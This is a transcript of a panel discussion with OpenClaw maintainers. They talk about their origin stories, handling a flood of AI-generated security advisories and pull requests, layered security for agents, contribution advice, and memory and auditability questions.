THE MAINTAINER LAYER

Introductions & Origin Stories [00:00]

Ashley Wolf First, I'd love for you to introduce yourself. Talk briefly about what you're maintaining on OpenClaw and how you came into the project. I'll start with you.

Control UI I do Control UI. I design the UI/UX, as well as some of the iOS stuff, not all of it yet. Both of them are in the macOS app, and also the V2 for the UI periphery, call hub, and control hub. That's mostly it, plus opinions by other people.

Ashley Wolf How did you come to join OpenClaw as a maintainer?

Control UI I had to beg and plead and email and email and email, and make multiple dashboards, very nice-looking, only to be told I had to write in a new framework, so it was not going to be as nice-looking. But I tried very hard.

Ashley Wolf And you made it.

Control UI Hopefully I made it. And if I didn't, I'm open to suggestions.

Jacob I'm Jacob Tomlinson. I work for NVIDIA. We're mainly providing security assistance to OpenClaw. We spend a lot of time going through the security advisories being opened against OpenClaw and figuring out what is noise, what is relevant, what we need to fix, what we can harden, and what we can change within OpenClaw.

Jacob We also maintain the NVIDIA interactions on the side. We got involved because Peter originally reached out to NVIDIA to partner with us and see how we could come in and support the project. NVIDIA has a bunch of people working on open-source libraries in different places, so a few people were put together. I love open-source projects, and this seemed like a great opportunity for multi-institutional open source: getting big companies working together to help a nonprofit. It seemed like exactly the right thing to back.

Ashley Wolf That's one way. Begging and pleading is another. Getting invited. Excellent. Sally?

Sally I'm Sally. I work for Red Hat. How I got into OpenClaw is: I went rogue. We definitely were not supposed to run OpenClaw on our laptops. I was on a few days off, and I installed it, and I instantly felt this was the most important project I had ever experienced.

Sally So I went back into Red Hat. It was everybody's day off; we have these recharge days. I went into Slack and said, "Guys, have you tried this new project, OpenClaw?" Instantly a few people were like, "Don't run OpenClaw. It's so insecure. What are you doing?"

Sally And I said, "Hello, what have I been working on for the past 11 years? I've been working on our product that is supposed to run any application securely. It's OpenShift, right? If we can't run this properly, what are we doing?"

Sally Then I see the three dots. Dot, dot, dot. It was one of the executives. I was like, "Oh yeah, this is on." He came in and said, "That's right, Sally. That's exactly what I'm talking about." From there, I emailed like everybody else did, and here I am.

Ashley Wolf Excellent. Brad?

Brad How can I follow Sally? She's the enthusiasm that brings up all of us negative nancies every time, so big ups for Sally.

Brad I'm Brad, CEO of Digital Meld. I focus on technology innovation for mid-market companies and help them punch above their weight class. I focus on AI automation. I came across this from the Microsoft Teams perspective. Peter told a funny story today that he almost didn't publish the plugin for Microsoft Teams. If he hadn't done that, I don't know if I would be here right now, so I'm glad he did.

Brad That got some intros into Microsoft, and a lot of what you see today came from that. Thank you to Microsoft for everything they've done. My goal is to reduce friction between Microsoft software and services. I would say OpenClaw has been enterprise-ready since day one because of Entra ID, because of Graph API, and because of all those sorts of things. It's great to see Microsoft giving that back to the world.

Ashley Wolf Vincent?

Vincent I'm Vincent. For those of you who don't know me, I'm Chief Architect at OpenClaw Foundation. I joined as a contributor pushing PRs in December or January, but I was obsessed. I literally had my clock set. I was saying, "This is going to change the world." Some people in this room will remember me saying that, and they probably thought I was crazy. So I get the last laugh.

Vincent What became my entry was that I needed in. I needed to be part of this project. So I hit Peter where I knew I could get his attention: I started doing security advisories. I created such a mess of a problem that he said, "You have to come join and fix the problem you started." Here we are today.

Josh I'm Josh. I'm with the OpenClaw Foundation too. I followed Peter on Twitter before OpenClaw took off in January. I saw it when it was his little side project in Marrakesh. I took some time off during the December holidays, came back, and took some time off from my job to start playing with AI. I discovered OpenClaw in January. Peter was saying, "Help, I need maintainers." I had just taken time off my job, so I was like, "Well, I'm not doing anything." It's been full throttle since. Here we are.

Security at Agent Scale [05:54]

Ashley Wolf Thank you all for being here. We heard a little bit about security. Security is a hot topic with OpenClaw. Some of you participated in the GitHub Secure Open Source Fund and program. I'd love to hear about your security journey and the project, and a little about the program if you can share.

Maintainer I can jump in. We're at a time right now where I think we're probably one of the biggest targets of a new wave of AI bug reports. It's really easy to find vulnerabilities in open-source code right now, and we're one of the bigger open-source projects at the moment, so we get a lot of security advisories.

Maintainer It's an especially hard problem because some of the magic of OpenClaw is a certain YOLO mode about it. We want to enable a permissive environment. We want it to be you and your computer doing whatever you want to do. But everybody's definition of safe and secure is different. In an enterprise context, that is not acceptable.

Maintainer We're getting a ton of bug reports and breaking in new and interesting ways every day. It was very hard for a while. Then NVIDIA came along and has been invaluable in helping us wrangle those. I think 85 or 90 percent of the GHSAs — the GitHub Security Advisories we received — were slop. Actual slop. But we still treat every single one of them seriously, because we have to. We cannot not take people's security seriously. It does drain a little bit.

Jacob It is dealing with the volume of stuff coming in. I've worked on open-source projects before as a maintainer. On a 10,000-star project, you might get single-digit security advisories or CVEs per year. You go through the process. You make the private fork or branch, fix the thing, time the release so the bug fix goes straight in, and everybody can pick it up.

Jacob How do you scale that when you're getting 60 bug reports a day, or triple digits on some days? You still need to treat every one with the same seriousness. You need to look at it and ask: Is this a real bug? Is this by design?

Jacob People are freaking out about the whole agent thing because it can call bash. It can do all sorts of things. So with this whole class of bugs, people say, "It can accidentally call exec," or do something else. But it can call exec by design. How do we mitigate that? We cannot change the philosophy of OpenClaw, otherwise it's not OpenClaw anymore. We need to mitigate these risks in other ways.

Jacob You cannot treat securing these agents in the same way you would treat securing traditional software. You always have to treat it like securing an employee. If you hire someone into your company, you cannot control everything they do. There is a certain amount of risk in having someone work for you and giving them access to systems.

Jacob So you set up a layered architecture: tracking what they do, giving them single sign-on, giving them access to different applications in controlled ways. We need to treat agents in that same way and have that layered architecture to secure them. We cannot just think of pull requests that fix security stuff. We have to design a whole system and stack to deal with it.

Ashley Wolf The more eyes on OpenClaw, and the more people using OpenClaw, the faster we make it the most robust project ever. That's the story of open source. That's what makes it so powerful.

Sally I have one point to think about. Please don't be delusional and think that it is a good idea to not accept PRs from agents, because eventually you're going to have to get over it. It's going to happen. It's going to be the future. If you want people to use your technology, you should expect that to happen.

Sally Fortunately, we have a magician on our side who knows Defense Against the Dark Arts. You can use agents against agents. They can be great at bash, as can you. You can put money behind it if money comes into play. Not all of us have [unclear] bucks, but for those who don't, there are sponsorships. You can use your resources to think about that and try to write that into the validation.

Sally There are a lot of open-source tools in our repo on GitHub. Fork it, play with it, turn it on. I think they're really helpful. I've been using them for deduplication, triages, and that helps as well.

The Contribution Surge & Tooling [10:39]

Ashley Wolf I want to dig in on what you touched on. There are more contributions on GitHub than ever before, maybe some of it thanks to OpenClaw and the rise of AI. We've seen phenomenal accelerated growth on the platform: users, contributions, more people doing open source than ever before. First, let's celebrate and appreciate that.

Ashley Wolf What are some of the tools or signals you use as you look at tens of thousands of issues and PRs? Can you share some of the tools you've already made, or quick signals you're using to evaluate what is coming into the platform?

Vincent One of the things most maintainers try to do when they first join is: "Oh my God, there are so many issues. There are so many PRs. I'm going to automate this." What we ended up doing was simpler than most people think.

Vincent We take every issue and PR, feed it through an LLM, and ask it three questions. The output gets clustered. That cluster is immutable, and every PR and issue gets bundled together. It is relatively cheap and relatively quick.

Vincent We quickly found that people's clients were essentially raising issues and PRs for the same issue. Lots of duplication. One night, it went from 10,000 PRs down to around 5,000. Peter and I probably closed half of them in a span of around 70 hours because most of it was heavy duplication. A lot of it was already solved or already resolved, but it was noise.

Vincent That was one solution: how do we combat the noise? How do we know which issue or PR is a regression? Subsequent to that, everyone started chipping in, and we started creating more automation around how we run agents on top of PRs. That's the factory stuff Peter was mentioning earlier.

Sally I'm currently unlearning everything I did over the past 12 years as a software engineer. That's really what we all have to do. These tools are making it possible.

What Good Contributions Look Like Now [12:56]

Ashley Wolf Before we turn it over for questions, what should people do? How should they craft contributions in a way that adds value, gets seen, and makes you want to reply and work with them? What do you suggest to folks who want to get involved in OpenClaw, or any open-source project?

Maintainer Do our job very well for us. Identify the implications. Identify the issues you're closing. Prioritize them. Say why you are leaving other related issues out there. If you do the things we would otherwise have to do ourselves, that obviously helps us.

Maintainer Another thing is, if you cannot do that, maybe just create an issue and let us come up with a solution. You may not come up with a solution that is the best thing ever. We have to realize our agents are not perfect. They make mistakes, and they make very convincing mistakes. Do not be fooled by those mistakes. Be aware that if you do not understand a topic, you probably should not make a PR about it.

Ashley Wolf I've heard Peter say exactly what you're talking about and call it a prompt request. We want a prompt request. If you do not want to bring code, we can bring code to it, but bring your ideas. Anyone else on what a good contribution could look like now with AI and open source?

Jacob One of the big things we've found is that open source is a community activity. It's humans working with other humans on stuff. We're all using agents to do this and accelerate ourselves, and it is building a buffer between us.

Jacob If you look at the issues and pull requests, they are all agent-written. So come to Discord. Come to the community places. Come join the [unclear] channel on Discord and talk to other humans about what you're working on, what you want to do, and what problems you want to solve. Together we can handle the code side and dealing with the agents and GitHub. But ultimately, we still need human-to-human communication.

Jacob That is the next thing we need to figure out collectively: how we avoid losing that. I think that's the biggest threat to all this. We still all need to work together. We hang out in a call all the time. Peter is basically always in this call, and we can drop in and talk to each other. There is still a huge human side to it. If you only look at PRs and issues, you cannot see that interaction, so we need other places to have it.

Jacob The other piece is proof. If you can attach proof, like a screenshot or video, or say, "I tested this as a human, I validated this," it jumps straight to the top.

Josh Jacob and Vincent covered the two biggest parts, but I would elaborate on what Vincent said: talk to your agent more. The best PRs consider the conventions of the project. They are not one line: "I have this problem, fix this thing. Okay, push."

Josh Find out the conventions. Make sure what you're doing is not going to cause regressions. Ask your clanker, "Is this the most robust way to do this?" The biggest reason I would opt not to use a contributed PR is because it goes against the conventions of the project, or it's a fragile fix. So talk to your clanker. Spend time with it.

Maintainer When you talk to your clanker, Peter added a tool where you can upload the transcript with your agent. That tells us how much time you spent thinking about the problem and trying to solve it. That is very valuable.

Maintainer Utilize the history of the problem you're trying to solve. If it is for a specific plugin, check the history of that plugin and see what PRs were pushed through and reversed. It will give you a roadmap of what the maintainers are looking for.

Ashley Wolf I like the suggestion that contributions look different now. They might come in all shapes and flavors. It could just look like joining the community, listening, and participating.

Maintainer Yes, absolutely. I hear there are interesting music sessions and multi-music dance parties happening on Discord, so anybody can join in on that.

Sally I will be slightly contrary. I see people writing in PR comments, tagging people, saying, "Please, somebody." Then they have other bots saying, "Please stop tagging everybody. Please don't do this anymore." Sometimes when you see humans in there, it is a very sad story. Do not be that sad story.

Sally If it is really, really important, trust me, you'll know. If it is not, you do not need to keep telling it over and over again. We also have lives. We are human beings. Most of us have jobs too. Be patient and understanding.

Sally The team has an intentionality to do the absolute best for everyone. We have a lot of [unclear]. Some of us become extremely overly productive and obsessive about that.

Jacob This does not apply only to OpenClaw. It applies to any open-source project. I would almost go as far as saying it applies to other repositories inside organizations adopting agentic AI. This level of speed and noise and AI and security is impacting everyone.

Ashley Wolf There are people behind projects. People with agents, maybe, in a lot of them. But we all work together in open source, and we want to create welcoming environments. So yes, be nice to the maintainers, especially maintainers receiving piles and piles of contributions that they truly want to go through.

Ashley Wolf Together, we can continue to make OpenClaw amazing and successful. Please do consider getting involved. This project is around four and a half or five months into this level of growth. You're still a young project. There is plenty of time for people to get involved.

Q&A: "Is OpenClaw Insecure?" [19:47]

Matt I run a lot of workshops where I help people install OpenClaw. The number one complaint I get over and over is: "It's not secure. What do I do to install it?" It creates a lot of unnecessary hurdles. I know the answer is just go ahead and install it, but I don't think that's enough for folks who have heard over and over that it is insecure. What would you recommend other than "YOLO"?

Brad There is so much of that. It has to be more than a quick answer. I install OpenClaw for businesses, and I am seeing it transform actual businesses today. One of my customers said it well. The CEO said, "We're juggling knives now." Nobody really knows what the future holds. Dave mentioned earlier that we're in the late nineties, the early days of the internet. Think of what you missed out on if you had an idea and did not see it through.

Brad I tell people it is risk versus reward. Everything is dangerous. OpenClaw is a tool. You have the ability to lock it down and give it the access you choose. Whatever agency you give it, that is on you. You have to take ownership.

Brad From a business perspective, show the ROI. If I can automate 80 percent of someone's menial tasks so they can focus on meaningful tasks to grow the business, it sells itself. I focus on the positive: here is what people have built when they took these steps. We can argue all day whether it is safe or not safe.

Brad And this week at Microsoft Build, Microsoft announced Scout. That's OpenClaw backed by Microsoft, with thousands of employees at Microsoft using it. If you need a proof point about a huge enterprise, there you go.

Jacob This is the thing: having different companies come in and add layers of security around it. OpenClaw is still OpenClaw. The scariest way to run OpenClaw is to install it as me on my laptop with access to all my stuff, all my credentials, everything. That is terrifying.

Jacob But if I put it in a contained environment, a sandboxed environment, run it in the cloud, put layers of authentication around it, give it its own identity and tokens, limit what it can talk to and access, audit things, and log things, that is the layered architecture I mean.

Jacob If you take OpenClaw and run bare OpenClaw, you're kind of on your own. But you can also go to Microsoft or whoever else is building structures around it to get an enterprise-packaged solution.

OpenClaw It is a thousand small things, and it starts from the lowest level of the operating system up. The bottom line is that AI is super powerful, so you have to give it that respect and configure it properly.

Q&A: Memory Systems [23:25]

Barron I'm Barron. I'm at Google. I help run the OpenClaw community at Google. It is amazing to see the January moment. We came back from break and, in classic Google fashion, seven OpenClaw variants spun up and tried to be the winner.

Barron The community we run at Google wanted me to ask: how do you run your memory systems? OpenClaw pioneered a very simple one, but it was very effective. Everybody has complicated ideas, and there is a lot of community discussion about what's great. Is it Gary's Brain? Is it other things? I'm curious how you run your own stuff.

Brad I can take this at least a little bit, because I do this for businesses and small teams. The memory system OpenClaw uses now can scale for a small or medium team. Scaling it to an enterprise perspective is a trillion-dollar idea that Microsoft and others are trying to solve.

Brad How do you share these markdown files from personal agents back to a centralized place and understand how it works across your business? The beauty is that they are markdown files, so you can use GitHub to share them with teammates securely, or Azure DevOps, or other solutions. That is what I do internally and what I do for my customers.

Brad If my fellow employees have a meeting with a client, I have access to their memories, and they have access to mine. Over time, you start small and build those things out.

Brad Things like Gary's Brain are great, but the way I see OpenClaw is that you need to make it yours. For you or your organization. I would point your OpenClaw at Gary's Brain and say, "You know my workflow. I've been working with you for three or four months. What from this repo should we use?" Then build your own. That is the real power of OpenClaw. You make it the foundation for everything you build.

Brad Take what other people do as inspiration, but put your own spin on it. Your secret sauce, that last 20 percent, is what makes you special, and that's what makes your agent special.

Maintainer One of the things we're working on in the background is releasing benchmarks. Scott is another maintainer here, and we're working with a few other people around evaluating long-running tasks and various personal AI-agent tasks, to understand which configuration is most ideal.

Maintainer But this is going to change. Something might work this week and change in three weeks. A new model will come out, and it will change. I can give you an answer now, but it is only based on what's good today. Be comfortable being uncomfortable. I think that's the future we live in.

Q&A: Adoption, Identity & Auditability [26:08]

Avril My name is Avril. I work in financial services, and I am a founder. My question is three-part, but you can answer at least one of them. What do you think the system is fundamentally missing in agent infrastructure today? Have you seen adoption in any industry in particular? How do you approach identity, consent, and auditability in agents?

Brad I can speak to adoption because I use this in industry. I focus mainly on blue-collar work. I'm from Houston, Texas, so oil and gas, construction, engineering, those types of industries. You would think those people would not be interested in these tools, but once you show them the possibilities, they are.

Brad I tell people all the time, "You're the AI expert. You just don't know it." These are people who are not technical, but they have 20 or 30 years of institutional knowledge and experience that makes them indispensable.

Brad I know the tools. I'm an "AI expert," quote-unquote, although nobody is. My goal is to share these tools with you so you understand how to better unlock your potential. Nobody in Silicon Valley has the institutional experience to build something for someone working in the oil fields of West Texas.

Brad The goal is for those people to learn the tools and build the systems that transform their businesses. I challenge everyone here with a 30-day challenge: how can I upskill myself in my space and unlock those potentials? From an auditing perspective, the memory is markdown files, and markdown files are auditable.

Jacob We're going to have to treat agents like we treat humans. The layers we have for auditing, tracking, and identifying humans working on systems are the same things we'll need for agents: identity providers and related controls.

OpenClaw Because this is a Microsoft-related event, Agent 365 is relevant. If you have not heard of that yet, the idea is creating an identity inside Microsoft 365 and Azure that is fully auditable and controllable by things like Microsoft Sentinel. That is one reason Microsoft is rolling these things up.

Closing Thanks [28:34]

OpenClaw I want to say thank you to everyone from OpenClaw. Actually, I want to give another shout-out to the other maintainers because I'm by far not the most productive maintainer of the bunch. These people work 24 hours a day, and I want to make sure they get recognized.

Ashley Wolf Thank you all for joining us today. We're so happy you came to the GitHub office. We wanted to hang out and celebrate with you the success of open source, what's been happening on GitHub, and the tremendous growth. If you're interested in chatting more with people from OpenClaw, we'll be hanging out here for the next bit. Thank you all for joining us. [recording ends]